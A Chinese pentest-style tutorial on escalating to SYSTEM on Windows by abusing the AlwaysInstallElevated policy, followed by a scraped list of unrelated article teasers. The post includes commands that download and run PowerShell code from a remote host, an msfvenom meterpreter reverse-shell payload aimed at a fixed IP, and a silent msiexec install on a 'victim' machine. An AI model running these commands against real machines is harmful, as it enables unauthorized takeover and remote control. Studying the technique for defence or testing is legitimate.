Windows操作系统提权之系统服务漏洞提权Always Install Elevated

Always Install Elevated

1.形成原因

任意用户以NT AUTHORITY\SYSTEM权限安装 i。
AlwaysInstallElevated是一个策略设置,当在系统中使用Windows Installer安装任何程序时,该参数允许非
特权用户以system权限运行MSI文件。如果目标系统上启用了这一设置,我们可以使用msf生成msi文件来以
system权限执行任意payload。
MSI:Microsoft Silent Installer,是微软的安装包格式,它在后台运行.exe安装程序

2.Always Install Elevated(判断是否激活Always Install Elevated)

在测试环境启用AlwaysInstallElevated,命令如下:

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

通过powerup判断

powershell -ep bypass iex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Get-RegistryAlwaysInstallElevated

 

powershell -ep bypass iex(new-object
net.webclient).downloadstring('http://150.158.137.72:8000/PowerUp.ps1');Get-
RegistryAlwaysInstallElevated

通过注册表判断

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
如果没有注册表项的话,那就代表没有开启,反之显示0x1则代表开启

通过修改注册表激活:

reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
Reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

3.提权准备 

1 下载exemsi( 将 EXE 转换为 MSI - 将可执行安装程序转换为 MSI 包 (exemsi.com)
2 msf生成exe程序
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=9090 LHOST=119.45.175.218 -f exe
>1.exe
3. 使用exemsi将exe封装为msi。
配置样式为下图所示,其他默认即可

4.提权流程 

上传test.msi到目标机器上

运行msi程序,得到system权限的shell。
受害者机器上执行:msiexec /quiet /qn /i 1.msi

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/20479.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

leetcode - 20.有效的括号(LinkedHashMap)

leetcode题目有效的括号,分类是easy,但是博主前前后后提交了几十次才通过,现在记录一下使用Java语言的写法。 题目链接: 20.有效的括号 题目描述: 给定一个只包括 (,),{,},[&…

【漏洞复现】WordPress Country State City Dropdown CF7插件 SQL注入漏洞(CVE-2024-3495)

0x01 产品简介 Country State City Dropdown CF7插件是一个功能强大、易于使用的 WordPress 插件,它为用户在联系表单中提供国家.州/省和城市的三级下拉菜单功能,帮助用户更准确地填写地区信息。同时,插件的团队和支持也非常出色&#xff0c…

香橙派 Kunpeng Pro使用教程:从零开始打造个人私密博客

一、引言 在这个日益互联的世界中,单板计算机已经成为创新和个性化解决方案的重要载体。而在单板计算机领域,香橙派 Kunpeng Pro凭借其强大的性能和灵活的应用潜力,正逐渐吸引着全球开发者和技术爱好者的目光。 作为一款集成了华为的鲲鹏处…

单调栈原理+练习

首先用一道题引出单调栈 码蹄集 (matiji.net) 首先画一个图演示山的情况: 最暴力的做法自然是O(n方)的双循环遍历,这么做的思想是求出当前山右侧有多少座比它小的山,遇见第一个高度大于等于它的就停止。 但是对于我们所求的答案数&#xff…

codefun的蓝桥杯国赛之旅

前言 好久没有刷算法了,今天完成了我的蓝桥杯国赛之旅! 总的来说,比赛的过程不是很顺利,只能ac两道题目,好多题都是有思路,但是要么是写不出来,要么是debug不出来,多重背包&#xf…

Docker(Centos7+)

先确定是否 Centos 7 及以上的版本 查看是否 ping 通外网 linux centos7运行下面的代码,基本上都可以正常安装 # 删除之前的docker残留 yum -y remove docker*yum install -y yum-utilsyum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/…

Controller类明明写了@CrossOrigin跨域注解,但还是有跨域问题

可能是写的过滤器干扰到了跨域处理。如: 此时,先注释掉过滤器注解,让其不生效,就可以避免干扰跨域处理了 不过,这只能暂时解决该问题,毕竟过滤器还是要用的,后续我再探索一下。。。。。。。

软设之冒泡排序

冒泡排序 冒泡排序的基本思想是通过相邻元素之间的比较和交换,将排序较小的元素逐渐从底层移向顶部。整个排序过程元素像气泡一样逐渐向上冒,因此叫冒泡排序。 比如说有数组 57,68,59,52 第一个元素和第二个元素比较…

[个人笔记] 记录docker-compose使用和Harbor的部署过程

容器技术 第三章 记录docker-compose使用和Harbor的部署过程 容器技术记录docker-compose使用和Harbor的部署过程Harborhttps方式部署:测试环境部署使用自签名SSL证书https方式部署:正式环境部署使用企业颁发的SSL证书给Docker守护进程添加Harbor的SSL证…

Flutter 中的 MediaQuery 小部件:全面指南

Flutter 中的 MediaQuery 小部件:全面指南 Flutter 是一个流行的跨平台 UI 框架,它允许开发者使用 Dart 语言构建高性能、美观的应用。在 Flutter 中,响应式设计是一个核心概念,MediaQuery 小部件在其中扮演了重要角色。MediaQue…

ctfshow unserialize

开始反序列化 web255 是从cookie中unserialize得到实例,考虑修改cookie中键user的值 $result urlencode(serialize(new ctfShowUser())); 为何需要url编码呢,不url编码也能成。url编码是对称加密,编码也不影响 web256 考察!不完全等于&…

Ollama+OpenWebUI+Phi3本地大模型入门

文章目录 OllamaOpenWebUIPhi3本地大模型入门一、基础环境二、Ollama三、OpenWebUI Phi3 OllamaOpenWebUIPhi3本地大模型入门 完全不懂大模型的请绕道,相信我李一舟的课程比较适合 Ollama提供大模型运行环境,OpenWebUI提供UI,Phi3就是那个大…

【学习】自动化测试与单元测试框架的差异化解析

在软件开发的世界中,质量保证是构建可靠、健壮应用程序的关键一环。在这个过程中,自动化测试和单元测试框架是确保代码质量的两种重要工具。尽管它们在目标上有着共同点——提高软件测试的效率和有效性,但它们在应用场景、功能特点以及实现方…

mongodb数据库查询调优之explain方法详解

在MongoDB中,explain()方法可以帮助我们了解查询语句的执行计划和性能。通过分析explain()的结果,我们可以找出潜在的性能问题并对其进行优化。 以下是使用explain()方法对MongoDB查询语句进行优化的步骤: 使用explain()方法获取查询的执行计…

Vue基础知识:vue3 对于 ref 值的类型定义

vue3 对于 ref 值的类型定义 从 vue2 到 vue3 之后,所有变量值都需要添加 ref() const name ref(kyle)意思是 vue3 变量由 vue 来控制,上面的 name 变量值并不是原始的字符串 kyle 而是被套了一层类型为 Ref 的对象。 使用的时候 console.log(name.v…

微信小程序怎么进行页面传参

微信小程序页面传参的方式有多种,每种方式都有其特定的使用场景和优势。以下是几种常见的页面传参方式,以及它们的具体使用方法和示例: URL参数传值 原理:通过在跳转链接中附加参数,在目标页面的onLoad函数中获取参数…

Day45 动态规划part05

LC1049最后一块石头重量II(未掌握) 未掌握分析:其实本题跟LC416分割等和子集类似,本质上题目的要求是尽量让石头分成重量相同的两堆,相撞之后剩下的石头最小,也就是01背包问题weight和value都是stones数组,题目可以看…

深度学习-02-创建变量的函数

深度学习-02-创建变量的函数 本文是《深度学习入门2-自製框架》 的学习笔记,记录自己学习心得,以及对重点知识的理解。如果内容对你有帮助,请支持正版,去购买正版书籍,支持正版书籍不仅是尊重作者的辛勤劳动&#xff0…

Go-Admin后台管理系统源码(GO+VUE)编译与部署

1.克隆源码: # Get backend code git clone https://github.com/go-admin-team/go-admin.git# Get the front-end code git clone https://github.com/go-admin-team/go-admin-ui.git3.下载并安装GO开发环境: 3.编译管理后台后端 # Enter the go-admin backend project cd ./…

Pytorch索引、切片、连接

文章目录 1.torch.cat()2.torch.column_stack()3.torch.gather()4.torch.hstack()5.torch.vstack()6.torch.index_select()7.torch.masked_select()8.torch.reshape9.torch.stack()10.torch.where()11.torch.tile()12.torch.take()13.torch.scatter() 1.torch.cat() torch.cat(…